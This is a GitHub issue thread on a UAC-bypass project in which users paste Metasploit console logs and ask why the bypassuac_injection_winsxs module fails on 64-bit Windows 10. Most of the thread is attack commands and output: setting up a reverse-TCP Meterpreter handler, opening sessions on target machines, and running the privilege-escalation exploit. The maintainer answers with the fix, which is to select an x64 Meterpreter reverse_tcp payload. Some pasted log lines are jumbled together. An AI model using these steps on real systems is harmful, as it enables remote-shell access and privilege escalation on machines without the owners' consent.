### ISSUE TITLE
bad-config: x86 Target Selected for x64 System

### ISSUE THREAD

**Issue by joker5bb** [L3cr0f/DccwBypassUAC#7]
[*] Started reverse TCP handler on 192.168.1.100:443 
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.112:49707) at 2017-10-15 12:18:29 -0400
set payload windows/metuse windows/local/bypassuac_injection_winsxs
msf exploit(bypassuac_injection_winsxs) > show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf exploit(bypassuac_injection_winsxs) > set session 1
session => 1
msf exploit(bypassuac_injection_winsxs) > set target 1
target => 1
msf exploit(bypassuac_injection_winsxs) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[+] Windows 10 (Build 14393). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
[*] Exploit completed, but no session was created.
msf exploit(bypassuac_injection_winsxs) > show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Windows x64

**Comment by L3cr0f** [comment]
What is the specific problem, the module fails even the target matches with the victim's machine?

**Comment by joker5bb** [comment]
It states that both architectures are supported. The target machine is x64. I set the target to be x64 just to be sure, but it fails to run. Please see the commands executed below. Is there a bug in switching to x64? Do I need to use a x64 reverse_tcp for this to work?

`msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 443
lport => 443
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.100:443 
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.109
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.109:49758) at 2017-10-16 11:11:03 -0400
set payload windows/metuse windows/local/bypassuac_injection_winsxs
msf exploit(bypassuac_injection_winsxs) > show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_injection_winsxs) > set session 1
session => 1
msf exploit(bypassuac_injection_winsxs) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64


msf exploit(bypassuac_injection_winsxs) > set target 1
target => 1
msf exploit(bypassuac_injection_winsxs) > show options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf exploit(bypassuac_injection_winsxs) > run

[*] Started reverse TCP handler on 192.168.1.100:4444 
[+] Windows 10 (Build 14393). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
[*] Exploit completed, but no session was created.
msf exploit(bypassuac_injection_winsxs) >`

**Comment by L3cr0f** [comment]
Yes, you must select the payload "windows/x64/meterpreter/reverse_tcp" after setting the target option to 1 (Windows x64) in order to execute the module in a 64 bits Windows machine.

**Comment by jisjose98** [comment]
exploit(windows/local/bypassuac_windows_store_reg) > exploit

[*] Started reverse TCP handler on 192.168.43.46:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[!] This exploit requires manual cleanup of 'C:\Users\IEUser\use bypassuac_injection_winsxs

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/windows/local/bypassuac_injection_winsxs  2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS


[*] Using exploit/windows/local/bypassuac_injection_winsxs
msf5 exploit(windows/local/bypassuac_injection_winsxs) > options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf5 exploit(windows/local/bypassuac_injection_winsxs) > set target 1
target => 1
msf5 exploit(windows/local/bypassuac_injection_winsxs) > options

Module options (exploit/windows/local/bypassuac_injection_winsxs):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


msf5 exploit(windows/local/bypassuac_injection_winsxs) > sessions

Active sessions
===============

  Id  Name  Type                     Information                       Connection
  --  ----  ----                     -----------                       ----------
  2         meterpreter x64/windows  MSEDGEWIN10\IEUser @ MSEDGEWIN10  192.168.43.46:4444 -> 192.168.43.46:34484 (10.0.2.15)
  3         meterpreter x64/windows  MSEDGEWIN10\IEUser @ MSEDGEWIN10  192.168.43.46:4444 -> 192.168.43.46:34486 (10.0.2.15)

msf5 exploit(windows/local/bypassuac_injection_winsxs) > set SESSION 2
SESSION => 2
msf5 exploit(windows/local/bypassuac_injection_winsxs) > exploit

[*] Started reverse TCP handler on 192.168.43.46:4444 
[+] Windows 10 (10.0 Build 17763). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_injection_winsxs) > 

AppData\Local\Temp\BfHDKsm.exe!
[*] Exploit completed, but no session was created.

**Comment by L3cr0f** [comment]
The error states the following:
`[-] Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System`
So you have to select an x64 payload like "windows/x64/meterpreter/reverse_tcp". In your example you are running the exploit with the default payload, which is for x86 systems.
